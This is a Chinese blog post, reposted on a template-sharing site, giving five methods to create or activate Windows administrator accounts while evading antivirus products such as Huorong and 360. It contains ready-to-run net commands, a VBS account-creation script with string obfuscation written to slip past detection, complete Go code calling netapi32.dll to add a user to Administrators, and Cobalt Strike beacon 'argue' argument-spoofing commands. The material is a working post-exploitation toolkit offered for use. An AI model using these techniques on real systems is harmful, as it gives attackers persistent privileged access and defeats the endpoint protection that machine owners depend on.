绕过杀软添加用户

这篇具有很好参考价值的文章主要介绍了绕过杀软添加用户。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

方法0、直接运行神器

360shellcode.zip

github可搜

方法1、激活GUEST用户

比较好用,试过很多次杀软都不拦截

net   user  guest  /active:yes   
net   user  guest   Aa123456.
net   localgroup  administrators  guest   /add
net   localgroup "Remote  Desktop Users"  guest  /add

方法2、net1绕过

net1.exe在C:/windows/system32下

绕过杀软添加用户

进入到目录下面,此时生成一个asd.txt

 绕过杀软添加用户

此时的asd.txt就和net 一样了,可以执行net user

绕过杀软添加用户

不会触发火绒告警(有的主机会有的主机不会不知道为啥)

绕过杀软添加用户

方法3、VBS API脚本

wscript.exe add.vbs 无法绕过火绒(会被当做adduser病毒干掉)

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","iiice")
od.SetPassword "123456"
od.SetInfo
Set of=GetObject(os&"/iiice",user)
oe.add os&"/admin"

 但是我们只要简单的尝试混淆即可绕过

Set wsnetwork=CreateObject("WS"&"CR"&"IPT"&"."&"NET"&"WO"&"RK") 
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","iiice")
Const strPassword = "123456"
od.SetPassword strPassword
od.SetInfo
Set of=GetObject(os&"/iiice",user)
oe.add os&"/iiice"

方法4、使用windows底层API

原理是使用windows本地的netapi32.dll来绕过杀软的监测

package main

import (
    "fmt"
    "os"
    "syscall"
    "unsafe"
)

//参考如下
//https://docs.microsoft.com/zh-cn/windows/win32/api/lmaccess/nf-lmaccess-netuseradd/
//https://github.com/CodyGuo/xcgui/blob/master/doc/cToGo.go
//https://github.com/iamacarpet/go-win64api/blob/master/users.go
//https://git.itch.ovh/itchio/ox/-/blob/ec75be15423d72ab9691a3318ecce3feee67b19b/syscallex/netapi32_windows.go
//https://pkg.go.dev/github.com/itchio/ox/syscallex#NetUserAdd
type USER_INFO_1 struct {
    Usri1_name         *uint16
    Usri1_password     *uint16
    Usri1_password_age uint32 //可忽略
    Usri1_priv         uint32
    Usri1_home_dir     *uint16
    Usri1_comment      *uint16
    Usri1_flags        uint32
    Usri1_script_path  *uint16
}
type LOCALGROUP_MEMBERS_INFO_3 struct {
    Lgrmi3_domainandname *uint16
}

const (
    USER_PRIV_GUEST            = 0
    USER_PRIV_USER             = 1
    USER_PRIV_ADMIN            = 2
    USER_UF_SCRIPT             = 1
    USER_UF_NORMAL_ACCOUNT     = 512
    USER_UF_DONT_EXPIRE_PASSWD = 65536
    //parmErr                     = 0
    NET_API_STATUS_NERR_Success = 0
)

type User struct {
    username string
    password string
}

func main() {
    // 请更改此处用户名密码
    info := User{
        username: "test",
        password: "123456",
    }

    r, err := NetUserAdd(info.username, info.password)
    if err != nil {
        fmt.Println(err)
    }
    fmt.Println(r)
    //if r == true {
    //  _, err := AddLocalGroup("test", "Administrators")
    //  if err != nil {
    //      fmt.Println(err)
    //  }
    //}
}

func NetUserAdd(user string, pass string) (bool, error) {
    var parmErr uint32
    parmErr = uint32(0)

    username := UtfToStr(user)
    password := UtfToStr(pass)
    userinfo := USER_INFO_1{
        Usri1_name:     username,
        Usri1_password: password,
        Usri1_priv:     USER_PRIV_USER,
        Usri1_flags:    USER_UF_SCRIPT | USER_UF_NORMAL_ACCOUNT | USER_UF_DONT_EXPIRE_PASSWD,
        //Usri1_home_dir:    UtfToStr(""),
        //Usri1_comment:     UtfToStr("test测试用户"),
        //Usri1_script_path: UtfToStr(""),
    }

    netapi, err := syscall.LoadLibrary("netapi32.dll")
    if err != nil {
        panic("dll引用失败")
    }
    AddUser, err := syscall.GetProcAddress(netapi, "NetUserAdd")
    result, _, _ := syscall.Syscall6(AddUser,
        4,
        uintptr(0),         //server
        uintptr(uint32(1)), //lever
        uintptr(unsafe.Pointer(&userinfo)),
        uintptr(unsafe.Pointer(&parmErr)), 0, 0,
    )
    //令必须使用管理员权限才能添加用户
    if result != NET_API_STATUS_NERR_Success {
        return false, fmt.Errorf("添加失败")
    } else {
        _, err = AddLocalGroup(user, "Administrators", netapi)
        if err != nil {
            fmt.Println(err)
        }
        return true, fmt.Errorf("添加成功%s:%s", user, pass)

    }

}

func AddLocalGroup(user, group string, netapi syscall.Handle) (bool, error) {
    work, _ := os.Hostname()
    WorkStation := UtfToStr(work + `\` + user)
    GroupName := UtfToStr(group)
    var uArray = make([]LOCALGROUP_MEMBERS_INFO_3, 1)
    uArray[0] = LOCALGROUP_MEMBERS_INFO_3{
        Lgrmi3_domainandname: WorkStation,
    }
    ALG, _ := syscall.GetProcAddress(netapi, "NetLocalGroupAddMembers")
    result, _, _ := syscall.Syscall6(ALG, 5,
        uintptr(0),                          // servername
        uintptr(unsafe.Pointer(GroupName)),  // group name
        uintptr(uint32(3)),                  // level
        uintptr(unsafe.Pointer(&uArray[0])), // user array.
        uintptr(uint32(len(uArray))), 0)
    if result != NET_API_STATUS_NERR_Success {
        return false, fmt.Errorf("添加管理组失败")
    } else {
        return true, fmt.Errorf("添加管理组Administrators成功")
    }
}
func UtfToStr(str string) *uint16 {
    res, err := syscall.UTF16PtrFromString(str)
    if err != nil {
        panic(err)
    }
    return res
}

方法5、利用CS argue参数欺骗文章来源地址https://www.toymoban.com/news/detail-457436.html

beacon> argue net1 /bypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbypass
beacon> run net1 user betasec 3had0w!@#123 /add 
beacon> run net1 localgroup administrators betasec /add

argue 进程参数欺骗
argue [command] [fake arguments]
argue 命令 假参数 欺骗某个命令参数
argue [command]
argue 命令 取消欺骗某个命令参数

到了这里,关于绕过杀软添加用户的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 2种方法教你,如何将exe注册为windows服务,直接从后台运行

    首先我们要打开cmd,下面的命令在cmd中运行,最好使用管理员运行cmd sc create ceshi binpath= D:ceshiceshi.exe type= own start= auto displayname= ceshi binpath :你的应用程序所在的路径。 displayname :服务显示的名称 在cmd中输入services.msc打开系统服务,查看是否出现ceshi名称的服务(即display

    2024年02月13日
    浏览(30)
  • 两种方法为WordPress添加用户自定义头像功能

     一般情况下, WordPress 默认都是使用 Gravatar头像 ,如果用户没有注册过 Gravatar 头像,那就使用网站设置的默认头像,这样用户体验不是很好;再则,如果直接调用 远程Gravatar 头像,还会影响网站的 加载速度 (WordPress缓存Gravatar头像到本地,提高加载速度)。所以,作为一个开

    2023年04月09日
    浏览(38)
  • 如果使用selenium绕过登录,直接进入主界面进行测试?

    如果我们的自动化case有几百条甚至一些大型项目有几千条case,每个case都要花几秒钟去登录(为什么一个简单的登录需要几秒钟,我甚至见过10秒左右才能login的项目,这种项目真实无力吐槽,大概原因是像淘宝、京东这样的对用户体验要求很高的ToC项目国内就那么几家,而我

    2024年02月12日
    浏览(29)
  • 怎么绕过天翼客户端直接拨号上网的详细图文教程

    第一步:你需要用校园天翼宽带拨号登陆一次电信网,登陆过后就会出来这个 第二步: 断开网络,并退出校园宽带软件。 打开网络和共享中心---更改适配器设置---右键Vnet_PPPoE---属性 如图,在选项页---拨号选项 把前两个点上, 重播选项 重播次数3 重播间隔 1分钟 断线重播也

    2024年02月06日
    浏览(33)
  • selenium保持用户登陆的方法(获取cookie和添加cookie)

    目录 获得cookie 实现登陆 首先在用户登陆界面手动获取用selenium点击等操作获得cookie,并保存至txt 在新链接添加cookie实现用户保持登陆

    2024年02月11日
    浏览(31)
  • 在 Linux 中把用户添加到组的四个方法

    Linux 组是用于管理 Linux 中用户帐户的组织单位。对于 Linux 系统中的每一个用户和组,它都有惟一的数字标识号。它被称为 用户 ID(UID)和组 ID(GID)。组的主要目的是为组的成员定义一组特权。它们都可以执行特定的操作,但不能执行其他操作。 Linux 中有两种类型的默认组

    2024年04月11日
    浏览(37)
  • 详细说明Win10添加开机自动运行软件3种方法

    每次启动电脑,都要手动打开 idea 编辑器(编程软件): 这样感觉很麻烦,能否在电脑启动时,就打开几个常用的软件,比如酷狗音乐, idea 等。 接下来,我便以开机自动运行 idea 软件为例子,来详细分析开机自动运行软件的 3种方法 。

    2024年02月09日
    浏览(37)
  • 微信小程序 background-image直接设置本地图片路径,编辑器正常显示,真机运行不显示解决方法

    微信小程序,设置background-image直接设置本地图片路径。 编辑器正常显示,真机运行不显示 background-image只能用网络url或者base64图片编码。 1、将本地图片转为网络url后设置到background-image上 例如,云开发,后台上传本地图片 2、本地图片转成base64格式后设置到background-image上

    2024年02月15日
    浏览(44)
  • 若依@v3.8.6前后端分离版:添加新用户表添加新登录接口,用于小程序或者APP获取token,并使用若依的验证方法

    1、创建一个前端APP用户表:app_user表,并插入一条数据 2、创建 AppUser 实体类 目录:ruoyi-common——src——main——java——com.ruoyi.common——core——domian——entity 注意:与 SysUser 同级目录 3、创建 AppUserMapper.xml 映射文件 目录:ruoyi-system——src——main——resources——mapper.system 注

    2024年02月04日
    浏览(39)
  • 绝了!阿里这款开源神器,MySQL数据直接实时同步到ES,太香了!

    canal.instance.dbPassword=canal canal.instance.connectionCharset = UTF-8 canal.instance.filter.regex=. … 使用startup.sh脚本启动canal-server服务; sh bin/startup.sh 启动成功后可使用如下命令查看服务日志信息; tail -f logs/canal/canal.log 2020-10-26 16:18:13.354 [main] INFO com.alibaba.otter.canal.deployer.CanalController - ## s

    2024年04月23日
    浏览(45)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包